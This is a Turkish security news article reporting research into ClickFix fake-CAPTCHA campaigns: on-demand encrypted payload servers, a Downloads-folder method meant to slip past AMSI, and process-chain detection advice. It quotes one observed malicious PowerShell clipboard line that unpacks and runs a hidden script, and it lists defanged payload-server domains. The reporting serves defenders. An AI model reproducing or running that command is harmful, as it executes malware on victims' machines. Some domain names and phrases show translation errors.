İnsanları kötü amaçlı yazılımları elle çalıştırmaya yönlendiren kandıran ClickFix, sessizce bir arka ofis haline geldi.
Yeni araştırmalar, sahte "insan olduğunu kanıtla" sayfalarının ardındaki kötü amaçlı komutların, artık her ziyaretçiye aynı kötü amaçlı yazılımı farklı bir kılıkla veren API odaklı sunucular tarafından dağıtıldığını gösteriyor. Aynı araştırma, Windows'un komut dosyası taramasını aşacak şekilde oluşturulmuş yeni bir dağıtım yöntemini de ortaya çıkardı.
Güvenlik araştırmacısı Bert-Jan Pals, birkaç ClickFix platformunu parçalara ayırdı ve canlı kampanyalardan yaklaşık 3.000 veriyi analiz etti. Bulgularını Haziran başında OrangeCon'da sundu ve ayrıntıları 30 Haziran'da yayınladı.
ClickFix'in tasarımı basittir. Bubi tuzaklı bir sayfada sahte bir CAPTCHA veya hata görüntülenir, gizli JavaScript panonuza bir komut bırakır ve sayfa size bir tuş birleşimine basıp yapıştırmanızı ve Enter tuşuna basmanızı söyler. Kötü amaçlı yazılımı kendiniz çalıştırırsınız.
Genellikle ilk adımda herhangi bir istismar söz konusu değildir ve genellikle geleneksel antivirüsün işaretleyeceği bir dosya yoktur, dolayısıyla geleneksel e-posta ve uç nokta kontrollerinin yakalayacağı daha az şey vardır.
ESET'in 2024'ün sonundan 2025'in ilk yarısına kadar %517'lik bir sıçrama ölçtüğü ve Microsoft'un 2025 Dijital Savunma Raporu'nun Defender Uzmanları ekibi tarafından görülen ilk erişim vakalarının %47'sine ulaştığını ortaya koyması yeterince iyi çalışıyor.
Tekniğin artık MITRE ATT&CK, T1204.004'te kendi girişi var.
Sipariş üzerine yapılan yükler
Yeni kısım, yüklerin nasıl üretildiğidir. Pals, komutlarını isteğe bağlı bir hizmet gibi çalışan arka uç sunuculardan alan sayfaları buldu: istekleri alıyorlar, erişim jetonunu kontrol ediyorlar, arayanı günlüğe kaydediyorlar ve her seferinde yeni şifrelenmiş bir komut gönderiyorlar.
Bir sunucudan 100 veri yükü istedi ve Base64, AES, TripleDES, Rijndael ve Deflate'in dönüşümlü karışımıyla sarılmış 100 farklı yük aldı. Paketlemeyi soyun ve en azından şimdilik hepsi aynı betiği açın; bu komut dosyası, bir PowerShell çalışma alanı aracılığıyla bellekte çalışır.
Kılık değiştirme tek kullanımlıktır; Altındaki kötü amaçlı yazılım öyle değil, ancak Pals, çekirdek yükün muhtemelen çok geçmeden kurban başına değişmeye başlayacağı konusunda uyarıyor. Aynı platform, yemleri 25 dilde sunuyor ve komutu ziyaretçinin işletim sistemiyle eşleştiriyor; macOS sürümleri Windows ile birlikte çalışıyor.
"Hizmet olarak" etiketi yalnızca markalama değildir. ESET, hazır ClickFix oluşturucularını diğer saldırganlara satan suçluları takip etti. Pals, her bir yükün talep üzerine nasıl dağıtıldığı konusunda bir katman daha derinde paralel bir ticarileştirme buldu.
Daha sessiz bir yol: İndirilenler klasörü yöntemi
İkinci bulgu ise panoyu izleyen savunmacılara doğrudan bir yanıttır. Yeni sayfalar, kötü amaçlı bir komutu kopyalamak yerine zararsız görünen bir komutu kopyalar.
Sayfa, bir dosyayı sessizce İndirilenler klasörüne indirir ve pano, bu dosyayı taşıyan, paketini açan ve içindeki betiği çalıştıran kısa bir "orkestratör" satırı alır. Yapıştırılan satır yükün kendisi değil, yalnızca orkestratör olduğundan, antivirüsün komut dosyalarını çalıştırmadan önce taramasına olanak tanıyan Windows özelliği olan AMSI'yi geçecek şekilde tasarlanmıştır. Kötü kod, indirilen dosyanın yan tarafında bulunur. Gözlenen pano satırı şöyle görünüyordu:
powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* Ben robot değil reCAPTCHA Doğrulama Kimliği:7947 *\""
İnfaz da gizliliğe doğru sürüklendi. Orijinal 2024 cazibesi insanlara Windows+R tuşlarına basıp Çalıştır kutusuna yapıştırmalarını söylüyordu. 2025'ten 2026'ya kadar yaygın olan daha yeni bir sürüm, onları Windows+X ve Windows Terminali'ne yönlendiriyor. Terminal kullanımı daha sıradan görünüyor ve Çalıştır kutusundan farklı olarak, RunMRU kayıt defteri anahtarında araştırmacıların normalde kontrol ettiği hiçbir iz bırakmıyor.
ClickFix bir süre önce yalnızca suçlulara yönelik bir araç olmaktan çıktı. Proofpoint, APT28, MuddyWater ve Kimsuky dahil Rusya, İran ve Kuzey Kore'den devlet destekli grupları, ClickFix'i mevcut enfeksiyon zincirlerine düşüren kampanyalara bağladı ve Kuzey Koreli ekipler, h için sahte bir "ClickFake Röportajı" sürümü oluşturdu.
o kripto para birimi çalışanları.
Bu hile, diğer güvenilir Windows araçlarına dayanan FileFix ve DownloadFix gibi adlandırılmış akrabalar ortaya çıkardı. Ölçek teorik de değil: güvenlik firması Expel, Ağustos 2025'in sonlarından bu yana muhtemelen 147.521 sisteme bulaşan bir ClearFake dalgası buldu.
Savunmacıların izlemesi gerekenler
Savunma dersi değişmedi. Ayrıntılar var. Güvenilir sinyaller, pano metni değil, işlem zincirleridir: explorer.exe veya WindowsTerminal.exe, powershell.exe, cmd.exe veya msiexec.exe'yi başlatıyor ve hemen ardından ağa ulaşıyor.
Bunlar Pals'ın verilerindeki en yaygın başlatıcılardı; PowerShell ve cmd'nin her biri yaklaşık %39'luk paya sahipken, msiexec de %34'lük oranla hemen arkasından geliyor.
Davranışsal EDR, hangi programların komut dosyası yorumlayıcılarını çağırabileceğini sınırlayan uygulama kontrol kuralları ve basit kullanıcı kılavuzu ("çalıştırmanız söylenen bir komutu asla Çalıştır kutusuna veya bir terminale yapıştırmayın") hala geçerliliğini koruyor. İndirilenler klasörü yöntemi, aranacak bir şey daha ekler: İndirilenler klasörüne dokunan ve ardından gizli bir PowerShell oluşturan masum görünümlü tek satırlık bir dosya.
Pals ayrıca araştırma sırasında görülen üç yük sunucusunu da listeledi:
çizgi roman yıldızı[.]lat
babybon[.]cfd
merkantalolol[.]asya
Bunlardan biriyle bağlantı enfeksiyon olduğunu kanıtlamaz. Bu, büyük olasılıkla birisinin panosuna bir komut yerleştirildiği anlamına gelir.
Pals'ın tekniğe ilişkin kararı net: "ClickFix burada kalacak." Araştırmasındaki model, ClickFix'in defans oyuncuları yetiştiği anda kayma yapması ve tek seferlik komut dosyalarından isteğe bağlı yük sunucularına geçişin, bu uyarlamanın tekrarlanmasının ucuz olmasını sağlayan şey olmasıdır.
İzlemeye değer bir sonraki şey, kötü amaçlı yazılımın yalnızca paketinin değil kendisinin de bir kurbandan diğerine değişmeye başlayıp başlamadığıdır.